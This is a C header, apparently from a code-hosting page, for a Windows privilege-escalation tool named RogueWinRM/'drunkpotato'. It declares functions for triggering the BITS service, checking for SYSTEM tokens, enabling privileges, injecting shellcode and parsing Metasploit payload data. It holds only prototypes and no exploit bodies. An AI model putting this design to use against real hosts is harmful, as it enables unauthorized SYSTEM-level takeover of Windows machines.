31 lines
876 B
C
31 lines
876 B
C
#pragma once
|
|
|
|
#include <wchar.h>
|
|
#include <assert.h>
|
|
|
|
|
|
struct _THREAD_PARAMETERS;
|
|
typedef struct _THREAD_PARAMETERS
|
|
{
|
|
char* winrm_port;
|
|
LocalNegotiator* negotiator;
|
|
} THREAD_PARAMETERS;
|
|
|
|
enum _createProcessMethod;
|
|
typedef enum _createProcessMethod
|
|
{
|
|
WITH_TOKEN,
|
|
AS_USER,
|
|
UNAUTHORIZED
|
|
} createProcessMethod;
|
|
|
|
|
|
int RunRogueWinRM(char* shellcode);
|
|
static int trigger_drunkpotato(char* shellcode, unsigned int shellcode_len, PROCESS_INFORMATION pi);
|
|
static createProcessMethod determineProcessLaunchingMethod(HANDLE hToken);
|
|
static BOOL EnablePriv(HANDLE hToken, LPCTSTR priv);
|
|
static int IsTokenSystem(HANDLE tok);
|
|
static BOOL isBitsRunning(void);
|
|
static BOOL triggerBits(void);
|
|
static void extract_metasploit_data(char* metasploit_bulk_data, char** winrm_port_address, wchar_t* process_name, char** shellcode, unsigned int* shellcode_length);
|